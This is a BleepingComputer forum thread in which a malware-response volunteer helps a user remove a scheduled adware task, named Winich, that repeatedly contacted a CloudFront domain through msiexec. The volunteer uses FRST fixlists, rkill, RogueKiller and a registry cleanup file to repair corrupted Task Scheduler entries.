Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

HOW TO REMOVE [msiexec d2buh1bf1g584w.cloudfront.net]


  • This topic is locked This topic is locked
13 replies to this topic

#1 Geman

Geman

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 19 April 2017 - 03:25 AM

Hi guys,I am George.

 

Recently I have had several problems with many adware and malware viruses.MIO.exe,QQ browser,Winsnare,WinSap.Fake browsers,Kuyeby.exe,Kitty,Snarer.dll,Chromium,and others.

 

I have used many programs to succesfully clean my laptop.

 

Zemana,HitmanPro,Malwarebytes,Eset online scanner,Roguekiller,Adware removal tool by TSA,AdwCleaner,Norton Security,Junk removal tool.

 

Although these programs did great job still I have the same problem with one thing.

 

Everyday,several times Malwarebytes antimalware blocks the same website : d2buh1bf1g584w.cloudfront.net

 

This domain trying to connect through the msiexec.exe

 

I have scanned again and again with the above programs with no result.

 

Everything clean...

 

Can you help me?Thank you

 

Attached File  FRST_19-04-2017 11.01.31.txt   124.06KB   4 downloads

 

Attached File  Addition_19-04-2017 11.01.31.txt   45.01KB   3 downloads

 

Attached File  MBAM.txt   616bytes   2 downloads

 

 



BC AdBot (Login to Remove)

 


#2 Geman

Geman
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 19 April 2017 - 10:10 AM

UPDATE

 

I think I have found the problem...

 

In the Task Scheduler I discovered a task named WINICH.This task has been programmed for 3 or four times a day to connect with the malicious domain d2buh1bf1g584w.cloudfront.net.

 

I deleted the above task and now I am waiting to see if this domain will try again to connect through msiexec.exe

 

I also look to the registry keys and I have found these malicious keys:

 

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Moncar
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Antanna
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Alltie

 

These keys are connected with the above domain.Of course I deleted them.

But I cannot find the key for the WINICH task

 

My task sheduler is corrupted.



#3 nasdaq

nasdaq

  • Malware Response Team
  • 39,225 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:14 PM

Posted 20 April 2017 - 08:30 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
(Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
GroupPolicy: Restriction - Chrome <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
Toolbar: HKU\S-1-5-21-2168158248-878123262-2501458908-1001 -> No Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -  No File
Handler: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} -  No File
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.9.1.12\Exts\Chrome.crx [2017-04-14]
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.9.1.12\Exts\Chrome.crx [2017-04-14]
U3 idsvc; no ImagePath
Task: {00A2DD07-9B1F-4375-A7D4-C51039FD5B98} - \Microsoft\Windows\Media Center\SqlLiteRecoveryTask -> No File <==== ATTENTION
Task: {00D31C53-5FE5-48D4-BB1B-02CDF9C02A47} - \Microsoft\Windows\Media Center\OCURActivate -> No File <==== ATTENTION
Task: {088482FA-65B8-4E17-9ABF-1DCD48E8D373} - \Microsoft\Windows\Tcpip\IpAddressConflict1 -> No File <==== ATTENTION
Task: {09F06BFE-A3C8-40E3-846A-6E6F4000C238} - \Microsoft\Windows\Tcpip\IpAddressConflict2 -> No File <==== ATTENTION
Task: {107D8345-4EC1-4995-A22E-1B10850BC24A} - \Adobe Acrobat Update Task -> No File <==== ATTENTION
Task: {15A7D09B-C6B4-4010-91EF-9468999EDFB6} - \Safer-Networking\Spybot Anti-Beacon\Refresh Anti-Beacon immunization -> No File <==== ATTENTION
Task: {1A13DA37-21EF-4EAE-90DC-3EBE77B8D0E5} - \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask -> No File <==== ATTENTION
Task: {1B8D9D0F-B4EF-43FB-A5E5-84C8967C1D76} - \Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate -> No File <==== ATTENTION
Task: {1CBB6F9B-9D44-46C2-B99C-8B345933CABC} - \Microsoft\Windows\Media Center\OCURDiscovery -> No File <==== ATTENTION
Task: {1EE2770A-FDE2-4D6D-B61A-D6CB72C090EE} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {1FB3E0A4-5A1D-4DBB-BA62-8B9931D4D22C} - \Microsoft\Windows\Media Center\DispatchRecoveryTasks -> No File <==== ATTENTION
Task: {215835B5-244A-49AF-AB53-1774E122EF1B} - \Microsoft\Windows\SideShow\SessionAgent -> No File <==== ATTENTION
Task: {21ED0DF8-B69C-4766-B54B-ED170AA67C4E} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot -> No File <==== ATTENTION
Task: {2701095E-E69B-4862-A7C0-CD92ED90F4D3} - \Microsoft\Windows\Media Center\mcupdate -> No File <==== ATTENTION
Task: {2C256DCE-1482-4A45-BBF9-D38267C291EA} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {2C2BFF78-B887-4F37-ABA7-9E97397769AC} - \Microsoft\Windows\Media Center\RecordingRestart -> No File <==== ATTENTION
Task: {32B2285E-98E2-41BD-9678-134BD6AADFDD} - \Winich -> No File <==== ATTENTION
Task: {36A9158D-4B25-4443-9EAE-D784BAB9CAFC} - \Norton Identity Safe\Norton Error Analyzer -> No File <==== ATTENTION
Task: {3B006AFB-D5DA-468C-8847-9C69328EA302} - \Microsoft\Windows\Media Center\ActivateWindowsSearch -> No File <==== ATTENTION
Task: {43699C97-724A-43A4-AD79-448BF4F67D57} - \Microsoft\Windows\Media Center\PeriodicScanRetry -> No File <==== ATTENTION
Task: {4520E8A9-AF06-4122-859B-E4B655B29B36} - \Microsoft\Windows\AppID\SmartScreenSpecific -> No File <==== ATTENTION
Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - \Microsoft\Windows\Shell\WindowsParentalControlsMigration -> No File <==== ATTENTION
Task: {49F8BC27-042C-4EDE-AE68-2D190244D464} - \Microsoft\Windows\SideShow\AutoWake -> No File <==== ATTENTION
Task: {4EFD8FC0-50B7-4F00-89D0-CCFAE97AF79E} - \Microsoft\Windows\UpdateOrchestrator\Maintenance Install -> No File <==== ATTENTION
Task: {4FDB1366-FFE7-448F-B82D-8249BFD307E0} - \{ABF97A73-625E-4AEE-BC90-42F4FEA7A402} -> No File <==== ATTENTION
Task: {51B7FB15-4DCB-400E-9A98-10E802F21FB3} - \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceScreenOnOff -> No File <==== ATTENTION
Task: {5482819A-7043-4E6F-ACBC-8D42034EFFE2} - \Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler -> No File <==== ATTENTION
Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - \Microsoft\Windows\Shell\WindowsParentalControls -> No File <==== ATTENTION
Task: {5C7E0020-DA0F-45B2-A072-F700189AEE54} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {606BC79E-CB09-4DCF-B76C-5D9006CF7CE3} - \Microsoft\Windows\Media Center\PBDADiscoveryW1 -> No File <==== ATTENTION
Task: {64B66932-2B95-4C07-991E-60F5A08591E2} - \Microsoft\Windows\Media Center\PBDADiscovery -> No File <==== ATTENTION
Task: {6830F183-F9C0-47C7-A46B-47158CEDFA7D} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {6A20BA58-946D-46B2-B804-224797D7279D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {6B105B39-E4E6-4339-B7B5-A2D5D0E301AA} - \Microsoft\Windows\Media Center\mcupdate_scheduled -> No File <==== ATTENTION
Task: {700F0C97-8E21-4FC3-BC3A-838A840FF8F5} - \Microsoft\Windows\Media Center\InstallPlayReady -> No File <==== ATTENTION
Task: {7BEE4076-876E-488E-8BBD-6BE6A60DCD69} - \Microsoft\XblGameSave\XblGameSaveTaskLogon -> No File <==== ATTENTION
Task: {7D0E6C2A-D333-4BBC-B5AC-F6CF1C25301B} - \Application Starter - f1375f225883e83d52e8db9690775c3c -> No File <==== ATTENTION
Task: {7F3E34E8-D0F5-4883-A60D-CC66A6050846} - \Microsoft\Windows\Media Center\UpdateRecordPath -> No File <==== ATTENTION
Task: {844548E0-1F77-41E6-9E46-750DEA8299D8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {893895E8-BE49-4C38-860B-173432F7E571} - \WPD\SqmUpload_S-1-5-21-2168158248-878123262-2501458908-1001 -> No File <==== ATTENTION
Task: {92CBB1DE-6201-47E7-A7D2-ADF725C4E690} - \Microsoft\Windows\MobilePC\HotStart -> No File <==== ATTENTION
Task: {97E4587B-460B-4DC0-8B75-616071F648B8} - \Microsoft\Windows\Media Center\PvrScheduleTask -> No File <==== ATTENTION
Task: {99CFD3CB-9A54-468D-B1CB-04D7ECBF242E} - \Microsoft\Windows\Media Center\PBDADiscoveryW2 -> No File <==== ATTENTION
Task: {9C51C232-C204-44CA-90F7-0C99F901DABD} - \Microsoft\Windows\Media Center\RegisterSearch -> No File <==== ATTENTION
Task: {A3CC9455-3D5E-4476-9A0B-BC6F46C7245E} - \Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate -> No File <==== ATTENTION
Task: {A8818506-BEE0-42FE-B41E-8220B624F5B4} - \Microsoft\Windows\SideShow\SystemDataProviders -> No File <==== ATTENTION
Task: {AE007377-521E-40F1-8EFC-05021EF000AE} - \Microsoft\Windows\Media Center\MediaCenterRecoveryTask -> No File <==== ATTENTION
Task: {AF8ACBC5-FA84-4E1B-AC15-B8360A75ECDB} - \Microsoft_MKC_Logon_Task_itype.exe -> No File <==== ATTENTION
Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor -> No File <==== ATTENTION
Task: {B320E058-C6FA-413F-876B-0C9B4428AE66} - \Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic6 -> No File <==== ATTENTION
Task: {B3D9FBDC-A7EB-4009-B0A9-2AE9E5650711} - \Microsoft_MKC_Logon_Task_ipoint.exe -> No File <==== ATTENTION
Task: {C6B2579B-4962-4D12-883D-BBD420573A6C} - \Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic1 -> No File <==== ATTENTION
Task: {C9ACBFD2-20AA-4A3F-BE1A-A3D5279BB1BB} - \Microsoft\Windows\Plug and Play\Plug and Play Cleanup -> No File <==== ATTENTION
Task: {C9E38EB9-ECC2-4FC9-8091-AB9673813CDC} - \Microsoft\Windows\UpdateOrchestrator\MusUx_UpdateInterval -> No File <==== ATTENTION
Task: {CC7B0A33-97F3-4E2D-B7DD-356D76C8D382} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {D09D2922-C054-47B9-8ECA-8C0B948C586F} - \Microsoft\Windows\UpdateOrchestrator\Policy Install -> No File <==== ATTENTION
Task: {D0D1A385-513C-4090-A252-853FCB94BA6B} - \Norton WSC Integration -> No File <==== ATTENTION
Task: {D19A2726-897E-4F7D-9CE4-0773B449CE9E} - \Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceConnectedToNetwork -> No File <==== ATTENTION
Task: {E3EDCFE7-BB39-4EF1-B4B5-F77E12236839} - \Microsoft\Windows\Media Center\PvrRecoveryTask -> No File <==== ATTENTION
Task: {E57FF741-24D4-49FF-B022-5953935AB770} - \Adobe Flash Player Updater -> No File <==== ATTENTION
Task: {E6D32E6F-5646-4B2B-97E9-770100246A5B} - \Microsoft\Windows\Media Center\ehDRMInit -> No File <==== ATTENTION
Task: {EACA24FF-236C-401D-A1E7-B3D5267B8A50} - \Microsoft\Windows\RAC\RacTask -> No File <==== ATTENTION
Task: {EC6EAF10-A6C3-49B6-91D1-6603006DE224} - \Norton Identity Safe\Norton Error Processor -> No File <==== ATTENTION
Task: {F8D34E23-3575-4BF4-AC82-A61BE9349137} - \Microsoft\Windows\Media Center\ReindexSearchRoot -> No File <==== ATTENTION
Task: {F8D615B2-5E9B-46F0-B8C6-CCF55821DFC0} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display -> No File <==== ATTENTION
Task: {F951535D-88B7-4D4C-BA41-B7D14F2CDC9A} - \Microsoft\Windows\SideShow\GadgetManager -> No File <==== ATTENTION
Task: {FA4107F7-8195-422C-AF93-0DA959EA7308} - \Microsoft\Windows Defender\MP Scheduled Scan -> No File <==== ATTENTION
Task: {FC715683-5AA8-41BE-8B25-34866E49BF1C} - no filepath
Task: {FEDA352E-93A3-487D-BEC7-64A74543BF17} - \Microsoft\Windows\Media Center\ConfigureInternetTimeService -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\7z1602-x64.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\Adware Removal Tool by TSA.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\appmanagersetup_2.0_b4_292(1).exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\drivermax_9_26_cnet.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\DriverTalent_setup.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\driver_booster_setup.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\esetonlinescanner_enu.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\ExcelViewer.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\Firefox Setup Stub 52.0.2 (1).exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\flashplayer21_xa_install.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\freac-1.0.26.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\hitmanpro_x64.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\mb3-setup-consumer-3.0.6.1469-10103.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\msert.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\NPE.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\revosetup.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\Setup.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\vlc-2.2.4-win32.exe:BDU [0]
AlternateDataStreams: C:\Users\Giorgos\Downloads\Zemana.AntiMalware.Portable.exe:BDU [0]
C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

If the problem persists run this search.

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 3 different versions. If one of them won't run then download and try to run the other one.
Vista and Win7 users need to right click and choose Run as Admin
You only need to get one of them to run, not all of them.

rkill.exe
rkill.com
rkill.scr

It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested on another computer and then transfer them to the desktop of the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.

When completed it will create a log. Please post the content on your next reply.
===

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or above, right-click the program file and select "Run as Administrator"
  • Accept the user agreements.
  • Execute the scan and wait until it has finished.
  • If a Windows opens to explain what [PUM's] are, read about it.
  • Click the RoguKiller icon on your taksbar to return to the report.
  • Click open the Report
  • Click Export TXT button
  • Save the file as ReportRogue.txt
  • Click the Remove button to delete the items in RED
  • Click Finish and close the program.
  • Locate the ReportRogue.txt file on your Desktop and copy/paste the contents in your next.
=======


Please post the logs and let me know what problem persists with this computer.

#4 Geman

Geman
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 20 April 2017 - 11:23 AM

Hi nasdaq,

 

Thank you for your help.

 

The domain d2buh1bf1g584w.cloudfront.net is not trying to connect anymore.

It seems that after deleting the task and the above keys which they were connected,it stopped.

The malware Winich is not there.There is no registry key.

 

My Task Scheduler  is better than before,but not perfect.

Several errors occur when I am trying to open for the first time or when I am opening specific tasks

 

Attached File  Fixlog.txt   43.44KB   1 downloads

 

Attached File  Rkill.txt   4.97KB   1 downloads

 

Attached File  ReportRogue.txt   2.95KB   1 downloads

 



#5 nasdaq

nasdaq

  • Malware Response Team
  • 39,225 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:14 PM

Posted 21 April 2017 - 07:18 AM

My Task Scheduler is better than before,but not perfect.
Several errors occur when I am trying to open for the first time or when I am opening specific tasks


Some tasks may be corrupted or no longer referencing the program.

The Registry key may be damaged.

Refer to this article
https://support.microsoft.com/en-us/help/2305420/ms10-092-vulnerability-in-task-scheduler-could-allow-for-elevation-of-privilege
Step 1: Locate the corrupted task references in the registry and in Task Scheduler

Any sign of unwanted task(s)?

Berore you make any change to the Registry make sure you have a good registry backup.
https://support.microsoft.com/en-us/help/322756/how-to-back-up-and-restore-the-registry-in-windows

Keep me posted.

#6 Geman

Geman
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 22 April 2017 - 03:24 AM

Until now I see no sign of unwanted tasks.

 

Now,when I expand the Library tree I can see all of the tasks that are in use.Before I couldn't see nothing.

 

Only a few errors:

 

 

Adobe flash player updater-"The task no longer exists"
ErrorDetailsUpdate-"The task no longer exists"
UpdateRecordPath-"The version of the work item is unsupported or invalid"
PBDADiscoveryW1-"The version of the work item is unsupported or invalid"
ObjectStoreRecoveryTask-"The version of the work item is unsupported or invalid"
ConfigureInternetTimeService-"The version of the work item is unsupported or invalid"



#7 nasdaq

nasdaq

  • Malware Response Team
  • 39,225 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:14 PM

Posted 22 April 2017 - 08:34 AM

Lets see what this key wlll report

SystemLook.exe
SystemLook_x64.exe
  • Double-click SystemLook.exe/SystemLook_x64.exe
  • to run it.
  • Copy and paste the content of the following bold text into the main textfield:
  • :reg
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree /sub
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
  • Note: The log can also be found on your Desktop entitled SystemLook.txt.


#8 Geman

Geman
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 22 April 2017 - 08:57 AM

Ηere is the log

 

Attached File  SystemLook.txt   532.46KB   1 downloads



#9 nasdaq

nasdaq

  • Malware Response Team
  • 39,225 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:14 PM

Posted 22 April 2017 - 10:42 AM

Create a system restore point
https://support.microsoft.com/en-ca/instantanswers/e6bbddb0-9db4-4d88-9063-42c52c79a96e/create-a-system-restore-point

Then run this .reg file to remove the offending enries.

Copy the text IN THE QUOTE BOX below to notepad. Save it as fixme.reg to your desktop.
Be sure the "Save as" type is set to "all files" Once you have saved Right click the .reg file and allow it to merge with the registry.
 

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\UpdateRecordPath]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\PBDADiscoveryW1]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ConfigureInternetTimeService]


Restart the computer when completed.

You can delete the fixme.reg file when done.

How is it now?

#10 Geman

Geman
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 23 April 2017 - 03:30 AM

Now it is fine.No error

 

Thank you

 

A few days ago the language bar disappeared and I couldn't type in windows search bar,but I made some changes in the registry key

 

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run "ctfmon"="CTFMON.EXE"

 

and now it's fine although it's different than before



#11 nasdaq

nasdaq

  • Malware Response Team
  • 39,225 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:14 PM

Posted 23 April 2017 - 08:20 AM


In Windows 10 this is control by this setting

https://superuser.com/questions/963978/language-bar-missing

---

How was the Registry entries set before you changed it?

#12 Geman

Geman
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 23 April 2017 - 08:35 AM

Yes,now it's there.

 

The registry entry was simple CTFMON.EXE



#13 nasdaq

nasdaq

  • Malware Response Team
  • 39,225 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:10:14 PM

Posted 23 April 2017 - 08:44 AM

I just checked my windows 10 and the Run "ctfmon"="CTFMON.EXE" is not present.

I do have the Language bar on the TaskBar.

If you need additional advice on this issues check the with Windows 10 Experts.
https://www.bleepingcomputer.com/forums/f/229/windows-10-support/
===

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
===

#14 Geman

Geman
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 23 April 2017 - 08:55 AM

Thank you very much for your help and your advice.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users